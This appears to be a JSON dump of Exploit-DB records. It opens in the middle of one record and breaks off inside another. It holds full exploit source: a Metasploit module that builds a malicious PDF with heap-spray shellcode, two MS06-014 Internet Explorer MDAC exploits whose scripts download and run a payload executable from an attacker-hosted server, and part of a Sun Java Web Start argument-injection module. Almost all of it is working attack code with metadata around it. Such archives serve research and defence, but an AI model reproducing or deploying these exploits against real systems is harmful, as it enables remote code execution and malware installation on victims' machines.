rand_text_alpha(rand(100) + 1)\r\n\t\trand10 = rand_text_alpha(rand(100) + 1)\r\n\t\trand11 = rand_text_alpha(rand(100) + 1)\r\n\t\trand12 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tscript = %Q|\r\n\t\tvar #{rand1} = unescape(\"#{shellcode}\");\r\n\t\tvar #{rand2} =\"\";\r\n\t\tfor (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{nops}\");\r\n\t\t#{rand4} = #{rand2} + #{rand1};\r\n\t\t#{rand5} = unescape(\"#{nops}\");\r\n\t\t#{rand6} = 20;\r\n\t\t#{rand7} = #{rand6}+#{rand4}.length\r\n\t\twhile (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};\r\n\t\t#{rand8} = #{rand5}.substring(0, #{rand7});\r\n\t\t#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});\r\n\t\twhile(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};\r\n\t\t#{rand10} = new Array();\r\n\t\tfor (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};\r\n\t\tvar #{rand12} = unescape(\"%0a\");\r\n\t\twhile(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};\r\n\t\t#{rand12} = 
\"N.\"+#{rand12};\r\n\t\tCollab.getIcon(#{rand12});\r\n\t\t\t\t\t|\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(script)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\r\n\t\tfile_create(pdf)\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\tdef make_pdf(js)\r\n\r\n\t\txref = []\r\n\t\teol = \"\\x0d\\x0a\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\tpdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << 
endobj\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\t\tpdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\t\tpdf << \"%%EOF\" << eol\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16681/"}, {"lastseen": "2016-01-31T15:25:39", "description": "MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014). CVE-2006-0003. 
Remote exploit for windows platform", "published": "2006-07-21T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer - MDAC Remote Code Execution Exploit MS06-014", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003"], "modified": "2006-07-21T00:00:00", "id": "EDB-ID:2052", "href": "https://www.exploit-db.com/exploits/2052/", "sourceData": "#!/bin/sh -\r\n\"exec\" \"python3\" \"-O\" \"$0\" \"$@\"\r\n# sh/Python polyglot: sh execs python3 on this file, Python sees a no-op string.\r\n\r\n__doc__ = \"\"\"[BL4CK] - MS06-014\r\n\r\nRDS.DataStore - Data Execution\r\nCVE-2006-0003\r\nMS06-014\r\n\r\nApril 2006\r\n\r\n*** this is a bit out-dated, but works very well ***\r\n\r\nUsage: ./bl4ck_ms06_014.py http://omfg.what.ho.st/~user/stage2.exe index.html\r\n\r\nNow upload index.html to the same webserver hosting your\r\nhttp://omfg.what.ho.st/~user/stage2.exe\r\n\r\n - redsand@blacksecurity.org\r\n\"\"\"\r\n\r\n__version__ = \"1.0\"\r\n\r\nimport sys\r\n\r\n\r\nclass MS06014:\r\n    \"\"\"Builds an HTML page whose VBScript payload instantiates the RDS.DataSpace\r\n    control (MS06-014), uses it to create XMLHTTP, ADODB.Stream, FileSystemObject\r\n    and Shell.Application objects, downloads the stage-2 executable and runs it.\"\"\"\r\n\r\n    # Page template; BL4CK_PAYLOAD is replaced with the VBScript below.\r\n    __html = \"\"\"\r\n <title></title>\r\n <head></head>\r\n\r\n <body>\r\n\r\n <script language=\"VBScript\">\r\n\r\n on error resume next\r\n\r\n BL4CK_PAYLOAD\r\n\r\n </script>\r\n <head>\r\n <title>[BL4CK] || 404 Not Found</title>\r\n </head><body>\r\n <h1>Not Found</h1>\r\n pwn3d!!\r\n <hr>\r\n <!-- <script>location.href='http://google.com'</script> -->\r\n </body>\r\n\r\n </html>\r\n\r\n \"\"\"\r\n\r\n    # VBScript payload; URLFILE is replaced with the stage-2 URL.\r\n    __payload = \"\"\"\r\n\r\n ' due to how ajax works, the file MUST be within the same local domain\r\n dl = \"URLFILE\"\r\n\r\n ' create adodbstream object\r\n Set df = document.createElement(\"object\")\r\n df.setAttribute \"classid\", \"cls­id:BD96C556-65A3-11D0-983A-00C04FC29E36\"\r\n str=\"Microsoft.XMLHTTP\"\r\n Set x = df.CreateObject(str,\"\")\r\n\r\n a1=\"Ado\"\r\n a2=\"db.\"\r\n a3=\"Str\"\r\n a4=\"eam\"\r\n str1=a1&a2&a3&a4\r\n str5=str1\r\n set S = df.createobject(str5,\"\")\r\n S.type = 1\r\n\r\n ' xml ajax req\r\n str6=\"GET\"\r\n x.Open str6, dl, False\r\n x.Send\r\n\r\n ' Get temp directory and create our destination name\r\n fname1=\"bl4ck.com\"\r\n set F = df.createobject(\"Scripting.FileSystemObject\",\"\")\r\n set tmp = F.GetSpecialFolder(2) ' Get tmp folder\r\n fname1= F.BuildPath(tmp,fname1)\r\n S.open\r\n ' open adodb stream and write contents of request to file\r\n ' like vbs dl+exec code\r\n S.write x.responseBody\r\n ' Saves it with CreateOverwrite flag\r\n S.savetofile fname1,2\r\n\r\n S.close\r\n set Q = df.createobject(\"Shell.Application\",\"\")\r\n Q.ShellExecute fname1,\"\",\"\",\"open\",0\r\n\r\n \"\"\"\r\n\r\n    def __init__(self, file):\r\n        self.__file = file\r\n\r\n    def bl4ck(self):\r\n        # Point the payload at the stage-2 URL, then drop it into the page.\r\n        payload = self.__payload.replace(\"URLFILE\", self.__file)\r\n        return self.__html.replace(\"BL4CK_PAYLOAD\", payload)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n    print(\"[BL4CK] MS06-014 - redsand@blacksecurity.org\")\r\n    print(\"url path to file must be on the same domain as the htm file\")\r\n    print(\"http://blacksecurity.org\\r\\n\")\r\n\r\n    if len(sys.argv) <= 2:\r\n        print(\"USAGE: %s <download url> <outfile>\" % sys.argv[0])\r\n        sys.exit(0)\r\n    url = sys.argv[1]\r\n    out = sys.argv[2]\r\n\r\n    ret = MS06014(url).bl4ck()\r\n\r\n    try:\r\n        with open(out, \"w\") as fsock:\r\n            fsock.write(ret)\r\n    except IOError:\r\n        pass\r\n\r\n    print(\"Wrote %r bytes to: %s\" % (len(ret), out))\r\n\r\n# milw0rm.com [2006-07-21]\r\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2052/"}, {"lastseen": "2016-01-31T15:39:45", "description": "Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) (2). CVE-2006-0003. 
Remote exploit for windows platform", "published": "2006-08-10T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer - MDAC Remote Code Execution Exploit MS06-014 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003"], "modified": "2006-08-10T00:00:00", "id": "EDB-ID:2164", "href": "https://www.exploit-db.com/exploits/2164/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::ie_createobject;\r\n\r\nuse strict;\r\nuse base \"Msf::Exploit\";\r\nuse Pex::Text;\r\nuse IO::Socket::INET;\r\nuse IPC::Open3;\r\n\r\nmy $advanced =\r\n {\r\n\t'Gzip' => [1, 'Enable gzip content encoding'],\r\n\t'Chunked' => [1, 'Enable chunked transfer encoding'],\r\n };\r\n\r\nmy $info =\r\n {\r\n\t'Name' => 'Internet Explorer COM CreateObject Code Execution',\r\n\t'Version' => '$Revision: 3753 $',\r\n\t'Authors' =>\r\n\t [\r\n\t\t'H D Moore <hdm [at] metasploit.com>',\r\n\t ],\r\n\r\n\t'Description' =>\r\n\t Pex::Text::Freeform(qq{\r\n\t\tThis module exploits a generic code execution vulnerability in Internet \r\n\t\tExplorer by abusing vulnerable ActiveX objects. 
\r\n}),\r\n\r\n\t'Arch' => [ 'x86' ],\r\n\t'OS' => [ 'win32', 'winxp', 'win2003' ],\r\n\t'Priv' => 0,\r\n\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],\r\n\t\t'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', \"0.0.0.0\" ],\r\n\t },\r\n\r\n\t'Payload' =>\r\n\t {\r\n\t\t'Space' => 4000,\r\n\t\t'Keys' => ['-bind'],\r\n\t },\r\n\t'Refs' =>\r\n\t [\r\n\t\t['MSB', 'MS06-014']\r\n\t ],\r\n\r\n\t'DefaultTarget' => 0,\r\n\t'Targets' =>\r\n\t [\r\n\t \t[ 'Automatic' ],\r\n\r\n\t\t# Patched\r\n\t\t[ 'MS06-014 - RDS.DataControl', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],\r\n\r\n\t\t# Not marked as safe\r\n\t\t[ 'UNKNOWN - RDS.DataSpace', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],\r\n\r\n\t\t# Not marked as safe\r\n\t\t[ 'UNKNOWN - Business Object Factory ', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'],\r\n\t\t\r\n\t\t# Not marked as safe\r\n\t\t[ 'UNKNOWN - Outlook Data Object', '{0006F033-0000-0000-C000-000000000046}'],\r\n\r\n\t\t# Found exploitable in the wild (no details)\r\n\t\t[ 'UNKNOWN - Outlook.Application', '{0006F03A-0000-0000-C000-000000000046}'],\r\n\r\n\t\t# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)\r\n\t\t[ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'],\r\n\t\t[ 'UNKNOWN - SoftwareDistribution.WebControl.1', '{6414512B-B978-451D-A0D8-FCFDF33E833C}'],\r\n\r\n\t\t# Part of the WMI SDK, currently unpatched/unreported\r\n\t\t[ 'UNKNOWN - WMIScriptUtils.WMIObjectBroker2.1', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'],\r\n\t\t\r\n\t\t# Visual Studio components, not marked as safe\r\n\t\t[ 'UNKNOWN - VsmIDE.DTE', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'],\r\n\t\t[ 'UNKNOWN - DExplore.AppObj.8.0', '{639F725F-1B2D-4831-A9FD-874847682010}'],\r\n\t\t[ 'UNKNOWN - VisualStudio.DTE.8.0', '{BA018599-1DB3-44f9-83B4-461454C84BF8}'],\r\n\t\t[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', 
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'],\r\n\t\t[ 'UNKNOWN - VsaIDE.DTE', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'],\t\t\t\r\n\t ],\r\n\r\n\t'Keys' => [ 'ie' ],\r\n\r\n\t'DisclosureDate' => '',\r\n };\r\n\r\nsub new {\r\n\tmy $class = shift;\r\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\r\n\treturn($self);\r\n}\r\n\r\nsub Exploit\r\n{\r\n\tmy $self = shift;\r\n\r\n\tmy $server = IO::Socket::INET->new(\r\n\t\tLocalHost => $self->GetVar('HTTPHOST'),\r\n\t\tLocalPort => $self->GetVar('HTTPPORT'),\r\n\t\tReuseAddr => 1,\r\n\t\tListen => 1,\r\n\t\tProto => 'tcp'\r\n\t );\r\n\tmy $client;\r\n\r\n\t# Did the listener create fail?\r\n\tif (not defined($server)) {\r\n\t\t$self->PrintLine(\"[-] Failed to create local HTTP listener on \" . $self->GetVar('HTTPPORT'));\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?\r\n\t Pex::Utils::SourceIP('1.2.3.4') :\r\n\t $self->GetVar('HTTPHOST');\r\n\r\n\t$self->PrintLine(\"[*] Waiting for connections to http://\". $httphost .\":\". 
$self->GetVar('HTTPPORT') .\"/\");\r\n\r\n\twhile (defined($client = $server->accept())) {\r\n\t\t$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));\r\n\t}\r\n\r\n\treturn;\r\n}\r\n\r\nsub HandleHttpClient\r\n{\r\n\tmy $self = shift;\r\n\tmy $fd = shift;\r\n\tmy $shellcode = my $shellcode = $self->GetVar('EncodedPayload')->Payload;\r\n\t \r\n\t# Set the remote host information\r\n\tmy ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);\r\n\r\n\t# Read the HTTP command\r\n\tmy ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);\r\n\r\n\t# Read the HTTP headers\r\n\tmy $headers;\r\n\twhile ( (my $line = $fd->RecvLine(10))) {\r\n\t\t$headers .= $line;\r\n\t\tlast if $line eq \"\\r\\n\";\r\n\t}\r\n\r\n\tif ($url =~ /\\?payload/) {\r\n\t\t$self->PrintLine(\"[*] HTTP Client $rhost:$rport asked for payload...\");\r\n\t\tmy $content = Pex::Utils::CreateWin32PE($shellcode, 'ie_createobject');\r\n\t\t$fd->Send($self->BuildResponse($content, 'application/octet-stream'));\r\n\t\t$fd->Close;\r\n\t\treturn;\r\n\t}\r\n\t$self->PrintLine(\"[*] HTTP Client $rhost:$rport asked for exploit page...\");\r\n\t$fd->Send($self->BuildResponse($self->GenerateHTML(), 'text/html'));\r\n\t$fd->Close;\r\n\treturn;\r\n}\r\n\r\nsub GenerateHTML {\r\n\tmy $self = shift;\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\tmy $objects = \"\";\r\n\t\r\n\tif ($target_idx == 0) {\r\n\t\tforeach my $target (@{ $self->Targets }) {\r\n\t\t\tif ($target->[1]) {\r\n\t\t\t\t$objects .= \"'\".$target->[1].\"',\";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\tmy $target = $self->Targets->[$target_idx];\r\n\t\t$objects .= \"'\".$target->[1].\"',\";\r\n\t}\r\n\r\n\tmy $data = \r\nqq#\r\n<html><head><title></title>\r\n<script language=\"javascript\">\r\n\r\nfunction Log(m) {\r\n\tvar log = document.createElement('p');\r\n\tlog.innerHTML = m;\r\n\tdocument.body.appendChild(log);\r\n\t\r\n}\r\n\r\nfunction CreateO(o, n) {\r\n\tvar r = null;\r\n\t\r\n\ttry { eval('r = o.CreateObject(n)') 
}catch(e){}\r\n\t\r\n\tif (! r) {\r\n\t\ttry { eval('r = o.CreateObject(n, \"\")') }catch(e){}\r\n\t}\r\n\t\r\n\tif (! r) {\r\n\t\ttry { eval('r = o.CreateObject(n, \"\", \"\")') }catch(e){}\r\n\t}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval('r = o.GetObject(\"\", n)') }catch(e){}\r\n\t}\r\n\t\r\n\tif (! r) {\r\n\t\ttry { eval('r = o.GetObject(n, \"\")') }catch(e){}\r\n\t}\r\n\t\r\n\tif (! r) {\r\n\t\ttry { eval('r = o.GetObject(n)') }catch(e){}\r\n\t}\r\n\t\r\n\treturn(r);\t\r\n}\r\n\r\nfunction Go(a) {\r\n\tLog('Creating helper objects...');\r\n\tvar s = CreateO(a, \"WScript.Shell\");\r\n\tvar o = CreateO(a, \"ADODB.Stream\");\r\n\tvar e = s.Environment(\"Process\");\r\n\t\r\n\tLog('Ceating the XMLHTTP object...');\r\n\tvar url = document.location + '?payload';\r\n\tvar xml = null;\r\n\tvar bin = e.Item(\"TEMP\") + \"metasploit.exe\";\r\n\tvar dat; \r\n\t\r\n\ttry { xml=new XMLHttpRequest(); }\r\n\tcatch(e) {\r\n\t\ttry { xml = new ActiveXObject(\"Microsoft.XMLHTTP\"); }\r\n\t\tcatch(e) {\r\n\t\t\txml = new ActiveXObject(\"MSXML2.ServerXMLHTTP\");\r\n\t\t}\r\n\t}\r\n\t\r\n\tif (! 
xml) return(0);\r\n\r\n\tLog('Downloading the payload...');\t\r\n\txml.open(\"GET\", url, false)\r\n\txml.send(null);\r\n\tdat = xml.responseBody;\r\n\r\n\tLog('Writing the payload to disk...');\t\r\n\to.Type = 1;\r\n\to.Mode = 3;\r\n\to.Open();\r\n\to.Write(dat);\r\n\to.SaveToFile(bin, 2);\r\n\r\n\tLog('Executing the payload...');\t\t\r\n\ts.Run(bin,0);\r\n}\r\n\r\nfunction Exploit() {\r\n\tvar i = 0;\r\n\tvar t = new Array(${objects}null);\r\n\t\r\n\twhile (t[i]) {\r\n\t\tvar a = null;\r\n\t\t\r\n\t\tif (t[i].substring(0,1) == '{') {\r\n\t\t\ta = document.createElement(\"object\");\r\n\t\t\ta.setAttribute(\"classid\", \"clsid:\" + t[i].substring(1, t[i].length - 1));\r\n\t\t} else {\r\n\t\t\ttry { a = new ActiveXObject(t[i]); } catch(e){}\r\n\t\t}\r\n\t\t\r\n\t\tif (a) {\r\n\t\t\ttry {\t\t\r\n\t\t\t\tvar b = CreateO(a, \"WScript.Shell\");\r\n\t\t\t\tif (b) {\r\n\t\t\t\t\tLog('Loaded ' + t[i]);\r\n\t\t\t\t\tGo(a);\r\n\t\t\t\t\treturn(0);\r\n\t\t\t\t}\r\n\t\t\t} catch(e){}\r\n\t\t}\r\n\t\ti++;\r\n\t}\r\n\tLog('Exploit failed.');\r\n}\r\n</script>\r\n</head>\r\n<body onload='Exploit()'>\r\n<p>Initializing...</p>\r\n</body>\r\n</html>\r\n#;\r\n}\r\n\r\nsub BuildResponse {\r\n\tmy ($self, $content, $type) = @_;\r\n\t$type ||= 'text/plain';\r\n\r\n\tmy $response =\r\n\t \"HTTP/1.1 200 OK\\r\\n\" .\r\n\t \"Content-Type: $type\\r\\n\";\r\n\r\n\tif ($self->GetVar('Gzip')) {\r\n\t\t$response .= \"Content-Encoding: gzip\\r\\n\";\r\n\t\t$content = $self->Gzip($content);\r\n\t}\r\n\tif ($self->GetVar('Chunked')) {\r\n\t\t$response .= \"Transfer-Encoding: chunked\\r\\n\";\r\n\t\t$content = $self->Chunk($content);\r\n\t} else {\r\n\t\t$response .= 'Content-Length: ' . length($content) . \"\\r\\n\" .\r\n\t\t \"Connection: close\\r\\n\";\r\n\t}\r\n\r\n\t$response .= \"\\r\\n\" . 
$content;\r\n\r\n\treturn $response;\r\n}\r\n\r\nsub Chunk {\r\n\tmy ($self, $content) = @_;\r\n\r\n\tmy $chunked;\r\n\twhile (length($content)) {\r\n\t\tmy $chunk = substr($content, 0, int(rand(10) + 1), '');\r\n\t\t$chunked .= sprintf('%x', length($chunk)) . \"\\r\\n$chunk\\r\\n\";\r\n\t}\r\n\t$chunked .= \"0\\r\\n\\r\\n\";\r\n\r\n\treturn $chunked;\r\n}\r\n\r\nsub Gzip {\r\n\tmy $self = shift;\r\n\tmy $data = shift;\r\n\tmy $comp = int(rand(5))+5;\r\n\r\n\tmy($wtr, $rdr, $err);\r\n\r\n\tmy $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');\r\n\tprint $wtr $data;\r\n\tclose ($wtr);\r\n\tlocal $/;\r\n\r\n\treturn (<$rdr>);\r\n}\r\n\r\n1;\r\n\r\n# milw0rm.com [2006-08-10]\r\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2164/"}, {"lastseen": "2017-03-23T13:17:02", "description": "Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit). CVE-2010-0886,CVE-2010-1423. 
Local exploit for Windows platform", "published": "2010-04-09T00:00:00", "type": "exploitdb", "title": "Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0886", "CVE-2010-1423"], "modified": "2010-04-09T00:00:00", "id": "EDB-ID:41700", "href": "https://www.exploit-db.com/exploits/41700/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n #\r\n # This module acts as an HTTP server\r\n #\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Sun Java Web Start Plugin Command Line Argument Injection',\r\n 'Description' => %q{\r\n This module exploits a flaw in the Web Start plugin component of Sun Java\r\n Web Start. The arguments passed to Java Web Start are not properly validated.\r\n By passing the lesser known -J option, an attacker can pass arbitrary options\r\n directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\r\n by Ruben Santamarta, an attacker can execute arbitrary code in the context of\r\n an unsuspecting browser user.\r\n This vulnerability was originally discovered independently by both Ruben\r\n Santamarta and Tavis Ormandy. Tavis reported that all versions since version\r\n 6 Update 10 \"are believed to be affected by this vulnerability.\"\r\n In order for this module to work, it must be ran as root on a server that\r\n does not serve SMB. 
Additionally, the target host must have the WebClient\r\n service (WebDAV Mini-Redirector) enabled.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => 'jduck',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2010-0886' ],\r\n [ 'CVE', '2010-1423' ],\r\n [ 'OSVDB', '63648' ],\r\n [ 'BID', '39346' ],\r\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html' ],\r\n [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => '',\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\"\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', { } ],\r\n [ 'Java Runtime on Windows x86',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Apr 09 2010'\r\n ))\r\n\r\n register_options(\r\n [\r\n OptPort.new('SRVPORT', [ true, \"The daemon port to listen on\", 80 ]),\r\n OptString.new('URIPATH', [ true, \"The URI to use.\", \"/\" ]),\r\n OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' 
])\r\n ], self.class)\r\n end\r\n\r\n\r\n def auto_target(cli, request)\r\n agent = request.headers['User-Agent']\r\n\r\n ret = nil\r\n #print_status(\"Agent: #{agent}\")\r\n # Check for MSIE and/or WebDAV redirector requests\r\n if agent =~ /(Windows NT (5|6)\\.(0|1|2)|MiniRedir\\/(5|6)\\.(0|1|2))/\r\n ret = targets[1]\r\n elsif agent =~ /MSIE (6|7|8)\\.0/\r\n ret = targets[1]\r\n else\r\n print_status(\"Unknown User-Agent #{agent}\")\r\n end\r\n\r\n ret\r\n end\r\n\r\n\r\n def on_request_uri(cli, request)\r\n\r\n # For this exploit, this does little besides ensures the user agent is a recognized one..\r\n mytarget = target\r\n if target.name == 'Automatic'\r\n mytarget = auto_target(cli, request)\r\n if (not mytarget)\r\n send_not_found(cli)\r\n return\r\n end\r\n end\r\n\r\n # Special case to process OPTIONS for /\r\n if (request.method == 'OPTIONS' and request.uri == '/')\r\n process_options(cli, request, mytarget)\r\n return\r\n end\r\n\r\n # Discard requests for ico files\r\n if (request.uri =~ /\\.ico$/i)\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n # If there is no subdirectory in the request, we need to redirect.\r\n if (request.uri == '/') or not (request.uri =~ /\\/([^\\/]+)\\//)\r\n if (request.uri == '/')\r\n subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'\r\n else\r\n subdir = request.uri + '/'\r\n end\r\n print_status(\"Request for \\\"#{request.uri}\\\" does not contain a sub-directory, redirecting to #{subdir} ...\")\r\n send_redirect(cli, subdir)\r\n return\r\n else\r\n share_name = $1\r\n end\r\n\r\n # dispatch WebDAV requests based on method first\r\n case request.method\r\n when 'OPTIONS'\r\n process_options(cli, request, mytarget)\r\n\r\n when 'PROPFIND'\r\n process_propfind(cli, request, mytarget)\r\n\r\n when 'GET'\r\n process_get(cli, request, mytarget, share_name)\r\n\r\n when 'PUT'\r\n print_status(\"Sending 404 for PUT #{request.uri} ...\")\r\n send_not_found(cli)\r\n\r\n else\r\n print_error(\"Unexpected request method 
encountered: #{request.method}\")\r\n\r\n end\r\n\r\n end\r\n\r\n #\r\n # GET requests\r\n #\r\n def process_get(cli, request, target, share_name)\r\n\r\n print_status(\"Responding to \\\"GET #{request.uri}\\\" request\")\r\n # dispatch based on extension\r\n if (request.uri =~ /\\.dll$/i)\r\n #\r\n # DLL requests sent by IE and the WebDav Mini-Redirector\r\n #\r\n print_status(\"Sending DLL\")\r\n\r\n # Re-generate the payload\r\n return if ((p = regenerate_payload(cli)) == nil)\r\n\r\n # Generate a DLL based on the payload\r\n dll_data = generate_payload_dll({ :code => p.encoded })\r\n\r\n # Send it :)\r\n send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' })\r\n\r\n else\r\n #\r\n # HTML requests sent by IE and Firefox\r\n #\r\n # This could probably use the Host header from the request\r\n my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\r\n # Always prepare the UNC path, even if we dont use it for this request...\r\n if (datastore['UNCPATH'])\r\n unc = datastore['UNCPATH'].dup\r\n else\r\n unc = \"\\\\\\\\\" + my_host + \"\\\\\" + share_name\r\n end\r\n jnlp = \"-J-XXaltjvm=\" + unc + \" -Xnosplash \" + rand_text_alphanumeric(8+rand(8)) + \".jnlp\"\r\n docbase = rand_text_alphanumeric(8+rand(8))\r\n\r\n # Provide the corresponding HTML page...\r\n if (request.uri =~ /\\.shtml/i)\r\n print_status(\"Sending JS version HTML\")\r\n # Javascript version...\r\n var_str = rand_text_alpha(8+rand(8))\r\n var_obj = rand_text_alpha(8+rand(8))\r\n var_obj2 = rand_text_alpha(8+rand(8))\r\n var_obj3 = rand_text_alpha(8+rand(8))\r\n js_jnlp = \"http: \"\r\n js_jnlp << 